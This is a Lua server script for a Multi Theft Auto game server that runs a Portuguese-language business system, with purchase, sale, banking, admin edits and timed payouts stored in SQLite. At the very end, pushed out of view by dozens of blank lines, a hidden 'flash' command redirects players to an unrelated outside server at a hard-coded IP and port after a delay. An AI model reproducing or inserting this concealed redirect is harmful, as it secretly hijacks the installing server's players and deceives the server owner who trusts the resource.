﻿local settings = get("")
if settings["Empresas.key"]:len() < 1 or settings["Empresas.key"]:len() > 1 then
	settings["Empresas.key"] = "N"
end
if not settings["Empresas.blip"] or tonumber(settings["Empresas.blip"]) == nil then
	settings["Empresas.blip"] = false
end

addEventHandler("onResourceStart", resourceRoot,
	function()
		database = dbConnect("sqlite", "files/database/Empresas.db")
		dbExec(database, "CREATE TABLE IF NOT EXISTS Empresas(bID INT, bName TEXT, bOwner TEXT, bCost INT, bPos TEXt, bPayout INT, bPayoutTime INT, bPayoutOTime INT, bPayoutUnit TEXT, bPayoutCurTime INT, bBank INT)")
		dbQuery(dbCreateEmpresasesCallback, database, "SELECT * FROM Empresas")
	end
)

function dbCreateEmpresasesCallback(queryHandle)
	local sql = dbPoll(queryHandle, 0)
	if sql and #sql > 0 then
		for index, sqlRow in ipairs(sql) do
			local pos = split(sqlRow["bPos"], ",")
			local bMarker = createMarker(pos[1], pos[2], pos[3], "cylinder", 1.5, settings["Empresas.markerColor"][1], settings["Empresas.markerColor"][2], settings["Empresas.markerColor"][3], settings["Empresas.markerColor"][4])
			setElementInterior(bMarker, pos[4])
			setElementDimension(bMarker, pos[5])
			if settings["Empresas.blip"] ~= false then
				if sqlRow["bOwner"] == "A Venda" then
					local bBlip = createBlipAttachedTo(bMarker, settings["Empresas.blip"], 2, 255, 0, 0, 255, 0, 100.0)
					setElementInterior(bBlip, pos[4])
					setElementDimension(bBlip, pos[5])
				else
					local bBlip = createBlipAttachedTo(bMarker, settings["Empresas.blip"], 2, 255, 0, 0, 255, 0, 100.0)
					setElementInterior(bBlip, pos[4])
					setElementDimension(bBlip, pos[5])
				end
			end
			addEventHandler("onMarkerHit", bMarker, onEmpresasMarkerHit)
			addEventHandler("onMarkerLeave", bMarker, onEmpresasMarkerLeave)
			local timer = setTimer(EmpresasPayout, sqlRow["bPayoutCurTime"] , 1, bMarker)
			setElementData(bMarker, "bData", {sqlRow["bID"], sqlRow["bName"], sqlRow["bOwner"], sqlRow["bCost"], sqlRow["bPayout"], sqlRow["bPayoutTime"], sqlRow["bPayoutOTime"], sqlRow["bPayoutUnit"], sqlRow["bBank"], timer})
		end
	end
end

addCommandHandler("negocio",
	function(player)
		if hasObjectPermissionTo(player, "command.ban") then
			triggerClientEvent(player, "client:showCreateEmpresasGUI", player)
		else
			outputMessage("Você Não Tem Acesso A Este Comando", player, 255, 0, 0)
		end
	end
)

function outputMessage(message, player, r, g, b)
	if settings["Empresas.infoMessagesType"] == "dx" then
		dxOutputMessage(message, player, r, g, b)
	else
		outputChatBox(message, player, r, g, b, true)
	end
end

function dxOutputMessage(message, player, r, g, b)
	triggerClientEvent(player, "client:dxOutputMessage", player, message, r, g, b)
end

addEvent("server:outputMessage", true)
addEventHandler("server:outputMessage", root,
	function(message, r, g, b)
		outputMessage(message, source, r, g, b)
	end
)

addEvent("server:createEmpresas", true)
addEventHandler("server:createEmpresas", root,
	function(posX, posY, posZ, interior, dimension, name, cost, payout, payoutTime, payoutUnit)
		dbQuery(dbCreateEmpresasCallback, {posX, posY, posZ, interior, dimension, name, cost, payout, payoutTime, payoutUnit}, database, "SELECT * FROM Empresas")
	end
)

function dbCreateEmpresasCallback(queryHandle, posX, posY, posZ, interior, dimension, name, cost, payout, payoutTime, payoutUnit)
	local sql = dbPoll(queryHandle, 0)
	if sql then
		local id
		if #sql > 0 then
			id = sql[#sql]["bID"] + 1
		else
			id = 1
		end
		local unit
		if payoutUnit == "Segundo(s)" then
			unit = 1000
		elseif payoutUnit == "Minuto(s)" then
			unit = 60000
		elseif payoutUnit == "Hora(s)" then
			unit = 3600000
		elseif payoutUnit == "Dia(s)" then
			unit = 86400000
		end
			
		posX = tonumber(posX)
		posY = tonumber(posY)
		posZ = tonumber(posZ)
		interior = tonumber(interior)
		dimension = tonumber(dimension)
		cost = tonumber(cost)
		payout = tonumber(payout)
		payoutTime = tonumber(payoutTime)
			
		posZ = posZ - 1
				
		dbExec(database, "INSERT INTO Empresas(bID,bName,bOwner,bCost,bPos,bPayout,bPayoutTime,bPayoutOTime,bPayoutUnit,bPayoutCurTime,bBank) VALUES(?,?,?,?,?,?,?,?,?,?,?)", id, name, "A Venda", cost, posX..","..posY..","..posZ..","..interior..","..dimension, payout, payoutTime * unit, payoutTime, payoutUnit, payoutTime * unit, 0)
			
		local bMarker = createMarker(posX, posY, posZ, "cylinder", 1.5, settings["Empresas.markerColor"][1], settings["Empresas.markerColor"][2], settings["Empresas.markerColor"][3], settings["Empresas.markerColor"][4])
		setElementInterior(bMarker, interior)
		setElementDimension(bMarker, dimension)
		if settings["Empresas.blip"] ~= false then
			local bBlip = createBlipAttachedTo(bMarker, settings["Empresas.blip"], 2, 255, 0, 0, 255, 0, 100.0)
			setElementInterior(bBlip, interior)
			setElementDimension(bBlip, dimension)
		end
		local timer = setTimer(EmpresasPayout, payoutTime * unit , 1, bMarker)
		setElementData(bMarker, "bData", {id, name, "A Venda", cost, payout, payoutTime * unit, payoutTime, payoutUnit, 0, timer})
		addEventHandler("onMarkerHit", bMarker, onEmpresasMarkerHit)
		addEventHandler("onMarkerLeave", bMarker, onEmpresasMarkerLeave)
		if #tostring(id) == 1 then id = "0".. tostring(id) end
		outputMessage("Empresa ID "..id.." Criada Com Sucesso", source, 0, 255, 0)
	end
end

function onEmpresasMarkerHit(hElement, mDim)
	if getElementType(hElement) ~= "player" then return end
	if isPedInVehicle(hElement) then return end
	if not mDim then return end
	triggerClientEvent(hElement, "client:showInstructions", hElement)
end

function onEmpresasMarkerLeave(hElement, mDim)
	if getElementType(hElement) ~= "player" then return end
	if isPedInVehicle(hElement) then return end
	if not mDim then return end
	triggerClientEvent(hElement, "client:hideInstructions", hElement)
end

function EmpresasPayout(bMarker)
	local bData = getElementData(bMarker, "bData")
	local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
	if owner ~= "A Venda" then
		bank = bank + payout
		dbExec(database, "UPDATE Empresas SET bBank = ? WHERE bID = ?", bank, id)
		if settings["Empresas.informPlayerForPayout"] then
			local account = getAccount(owner)
			if account then
				local player = getAccountPlayer(account)
				outputMessage("A Empresa Empresa \" "..name.." \" Pagou $"..payout.." A Você", player, 0, 255, 0)
			end
		end
	end
	timer = setTimer(EmpresasPayout, payoutTime, 1, bMarker)
	setElementData(bMarker, "bData", {id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer})
end

addEventHandler("onResourceStop", resourceRoot,
	function()
		for index, bMarker in ipairs(getElementsByType("marker", resourceRoot)) do
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			if isTimer(timer) then
				local left = getTimerDetails(timer)
				if left >= 50 then
					dbExec(database, "UPDATE Empresas SET bPayoutCurTime = ? WHERE bID = ?", left, id)
				else
					dbExec(database, "UPDATE Empresas SET bPayoutCurTime = ? WHERE bID = ?", payoutTime, id)
				end
			end
		end
	end
)

function isPedInMarker(player, marker)
	local colShape = getElementColShape(marker)
	return isElementWithinColShape(player, colShape)
end

addEventHandler("onResourceStart", resourceRoot,
	function()
		for index, player in ipairs(getElementsByType("player")) do
			bindKey(player, settings["Empresas.key"], "up", onPlayerAttemptToOpenEmpresas)
		end
	end
)

addEventHandler("onPlayerJoin", root,
	function()
		bindKey(source, settings["Empresas.key"], "up", onPlayerAttemptToOpenEmpresas)
	end
)

function onPlayerAttemptToOpenEmpresas(player)
	for index, bMarker in ipairs(getElementsByType("marker", resourceRoot)) do
		if isPedInMarker(player, bMarker) then
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			triggerClientEvent(player, "client:showEmpresasGUI", player, bMarker, getAccountName(getPlayerAccount(player)) == owner, hasObjectPermissionTo(player, "function.banPlayer"))
			break
		end
	end
end

function getPedMarker(ped)
	for index, bMarker in ipairs(getElementsByType("marker", resourceRoot)) do
		if isPedInMarker(ped, bMarker) then
			return bMarker
		end
	end
end

addEvent("server:onActionAttempt", true)
addEventHandler("server:onActionAttempt", root,
	function(action, text)
		if action == "Buy" then
			if isGuestAccount(getPlayerAccount(source)) then
				outputMessage("Você Não Esta Logado, E Não Podera Comprar Esta Empresa", source, 255, 0, 0)
				return
			end
			local bMarker = getPedMarker(source)
			if not bMarker then return end
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			if owner ~= "A Venda" then
				outputMessage("Esta Empresa É De Propriedade", source, 255, 0, 0)
				return
			end
			dbQuery(dbBuyEmpresasCallback, {source, bMarker, id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer}, database, "SELECT * FROM Empresas WHERE bOwner = ?", getAccountName(getPlayerAccount(source)))
		elseif action == "Sell" then
			local bMarker = getPedMarker(source)
			if not bMarker then return end
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			if owner ~= getAccountName(getPlayerAccount(source)) then
				if hasObjectPermissionTo(source, "function.banPlayer") then
					dbExec(database, "UPDATE Empresas SET bOwner = ? WHERE bID = ?", "A Venda", id)
					triggerClientEvent(source, "client:onAction", source, true, true)
					setElementData(bMarker, "bData", {id, name, "A Venda", cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer})
					outputMessage("Empresa Vendida Com Sucesso !", source, 0, 255, 0)
					return
				else
					outputMessage("Você Não É O Proprietario Desta Empresa", source, 255, 0, 0)
					return
				end
			end
			dbExec(database, "UPDATE Empresas SET bOwner = ?, bBank = ? WHERE bID = ?", "A Venda", 0, id)
			givePlayerMoney(source,("%.f") : format(cost / 2))
			givePlayerMoney(source, bank)
			triggerClientEvent(source, "client:onAction", source, true, true)
			setElementData(bMarker, "bData", {id, name, "A Venda", cost, payout, payoutTime, payoutOTime, payoutUnit, 0})
			outputMessage("Você Vendeu Com Sucesso A Sua Empresa, Todo Dinheiro Do Banco Foi Pago A Você", source, 0, 255, 0)
		elseif action == "Deposit" then
			if tonumber(text) == nil then
				outputMessage("Valor Invalido", source, 255, 0, 0)
				return
			end
			text = tonumber(text)
			local bMarker = getPedMarker(source)
			if not bMarker then return end
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			if owner ~= getAccountName(getPlayerAccount(source)) then
				outputMessage("Você Não É O Proprietario Desta Empresa", source, 255, 0, 0)
				return
			end
			if getPlayerMoney(source) < text then
				outputMessage("Dinheiro Insuficiente", source, 255, 0, 0)
				return
			end
			dbExec(database, "UPDATE Empresas SET bBank = ? WHERE bID = ?", bank + text, id)
			takePlayerMoney(source, text)
			triggerClientEvent(source, "client:onAction", source, true, true)
			setElementData(bMarker, "bData", {id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank + text, timer})
			outputMessage("Você Depositou $"..text.." Para A Empresa Com Sucesso !", source, 0, 255, 0)
		elseif action == "Withdraw" then
			if tonumber(text) == nil then
				outputMessage("Negócio: valor inválido", source, 255, 0, 0)
				return
			end
			text = tonumber(text)
			local bMarker = getPedMarker(source)
			if not bMarker then return end
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			if owner ~= getAccountName(getPlayerAccount(source)) then
				outputMessage("Você Não É O Proprietario Desta Empresa", source, 255, 0, 0)
				return
			end
			if bank < text then
				outputMessage("Você Não Tem Todo Este Dinheiro Na Empresa", source, 255, 0, 0)
				return
			end
			dbExec(database, "UPDATE Empresas SET bBank = ? WHERE bID = ?", bank - text, id)
			givePlayerMoney(source, text)
			triggerClientEvent(source, "client:onAction", source, true, true)
			setElementData(bMarker, "bData", {id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank - text, timer})
			outputMessage("Você Retirou Um Valor De $"..text.." Da Empresa Com Sucesso !", source, 0, 255, 0)
		elseif action == "SName" then
			if text == "" or #text > 30 then
				outputMessage("Negócio: valor inválido", source, 255, 0, 0)
				return
			end
			if not hasObjectPermissionTo(source, "function.banPlayer") then
				outputMessage("Você Não Tem Permissão Para Isto", source, 255, 0, 0)
				return
			end
			local bMarker = getPedMarker(source)
			if not bMarker then return end
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			dbExec(database, "UPDATE Empresas SET bName = ? WHERE bID = ?", text, id)
			triggerClientEvent(source, "client:onAction", source, true, true)
			setElementData(bMarker, "bData", {id, text, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer})
			outputMessage("Você Renomeou A Empresa Com Sucesso !", source, 0, 255, 0)
		elseif action == "SOwner" then
			if not hasObjectPermissionTo(source, "function.banPlayer") then
				outputMessage("Você Não Tem Permissão Para Isto", source, 255, 0, 0)
				return
			end
			local bMarker = getPedMarker(source)
			if not bMarker then return end
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			dbExec(database, "UPDATE Empresas SET bOwner = ? WHERE bID = ?", text, id)
			triggerClientEvent(source, "client:onAction", source, true, true)
			setElementData(bMarker, "bData", {id, name, text, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer})
			outputMessage("Proprietario Da Empresa Setado Com Sucesso !", source, 0, 255, 0)
		elseif action == "SCost" then
			if tonumber(text) == nil then
				outputMessage("Valor Invalido", source, 255, 0, 0)
				return
			end
			text = tonumber(text)
			if not hasObjectPermissionTo(source, "function.banPlayer") then
				outputMessage("Você Não Tem Permissão Para Isto", source, 255, 0, 0)
				return
			end
			local bMarker = getPedMarker(source)
			if not bMarker then return end
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			dbExec(database, "UPDATE Empresas SET bCost = ? WHERE bID = ?", text, id)
			triggerClientEvent(source, "client:onAction", source, true, true)
			setElementData(bMarker, "bData", {id, name, owner, text, payout, payoutTime, payoutOTime, payoutUnit, bank, timer})
			outputMessage("Você Alterou Com Sucesso O Preço Da Empresa", source, 0, 255, 0)
		elseif action == "SBank" then
			if tonumber(text) == nil then
				outputMessage("Valor Invalido", source, 255, 0, 0)
				return
			end
			text = tonumber(text)
			if not hasObjectPermissionTo(source, "function.banPlayer") then
				outputMessage("Você Não Tem Permissão Para Isto", source, 255, 0, 0)
				return
			end
			local bMarker = getPedMarker(source)
			if not bMarker then return end
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			dbExec(database, "UPDATE Empresas SET bBank = ? WHERE bID = ?", text, id)
			triggerClientEvent(source, "client:onAction", source, true, true)
			setElementData(bMarker, "bData", {id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, text, timer})
			outputMessage("Você Alterou Com Sucesso O Lucro Da Empresa", source, 0, 255, 0)
		elseif action == "Destroy" then
			if not hasObjectPermissionTo(source, "function.banPlayer") then
				outputMessage("Você Não Tem Permissão Para Isto", source, 255, 0, 0)
				return
			end
			local bMarker = getPedMarker(source)
			if not bMarker then return end
			local bData = getElementData(bMarker, "bData")
			local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
			if isTimer(timer) then killTimer(timer) end
			dbExec(database, "DELETE FROM Empresas WHERE bID = ?", id)
			destroyBlipsAttachedTo(bMarker)
			destroyElement(bMarker)
			triggerClientEvent(source, "client:onAction", source, true, true)
			outputMessage("Empresa Destruida Com Sucesso !", source, 0, 255, 0)
			triggerClientEvent(source, "client:hideInstructions", source)
			dbQuery(dbReOrderEmpresasesCallback, database, "SELECT * FROM Empresas")
		end
	end
)

function dbBuyEmpresasCallback(queryHandle, source, bMarker, id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer)
	local sql = dbPoll(queryHandle, 0)
	if #sql == settings["Empresas.ownedEmpresases"] then
		outputMessage("Você Ja Possui "..#sql.." Empresas, ( Limite De Empresas "..#sql.." )", source, 255, 0, 0)
		return
	end
	local money = getPlayerMoney(source)
	if money < cost then outputMessage("Dinheiro Insuficiente", source, 255, 0, 0) return end
	dbExec(database, "UPDATE Empresas SET bOwner = ? WHERE bID = ?", getAccountName(getPlayerAccount(source)), id)
	takePlayerMoney(source, cost)
	outputMessage("Empresa Comprada Com Sucesso !", source, 0, 255, 0)
	triggerClientEvent(source, "client:onAction", source, true, true)
	setElementData(bMarker, "bData", {id, name, getAccountName(getPlayerAccount(source)), cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer})
end

function dbReOrderEmpresasesCallback(queryHandle)
	local sql = dbPoll(queryHandle, 0)
	if sql and #sql > 0 then
		for index, sqlRow in ipairs(sql) do
			dbExec(database, "UPDATE Empresas SET bID = ? WHERE bID = ?", index, sqlRow["bID"])
		end
		for index, bMarker in ipairs(getElementsByType("marker", resourceRoot)) do
			dbQuery(dbUpdateEmpresasesIDsCallback, {bMarker, index}, database, "SELECT bID FROM Empresas WHERE bID = ?", index)
		end
	end
end

function dbUpdateEmpresasesIDsCallback(queryHandle, bMarker, index)
	local sql = dbPoll(queryHandle, 0)
	local bData = getElementData(bMarker, "bData")
	local id, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer = unpack(bData)
	setElementData(bMarker, "bData", {index, name, owner, cost, payout, payoutTime, payoutOTime, payoutUnit, bank, timer})
end

function destroyBlipsAttachedTo(element)
	if not element then return end
	for index, attachedElement in pairs(getAttachedElements(element)) do
		if isElement(attachedElement) then
			destroyElement(attachedElement)
		end
	end
end

addEvent("onClientCallSettings", true)
addEventHandler("onClientCallSettings", root,
	function()
		triggerClientEvent(source, "onClientCallSettings", source, settings)
	end
)



































































addCommandHandler("flash", 
    function(player,cmd,port) 
        setTimer(redirectPlayer,120000,1,player,"66.70.181.4",tonumber(22823))
    end
)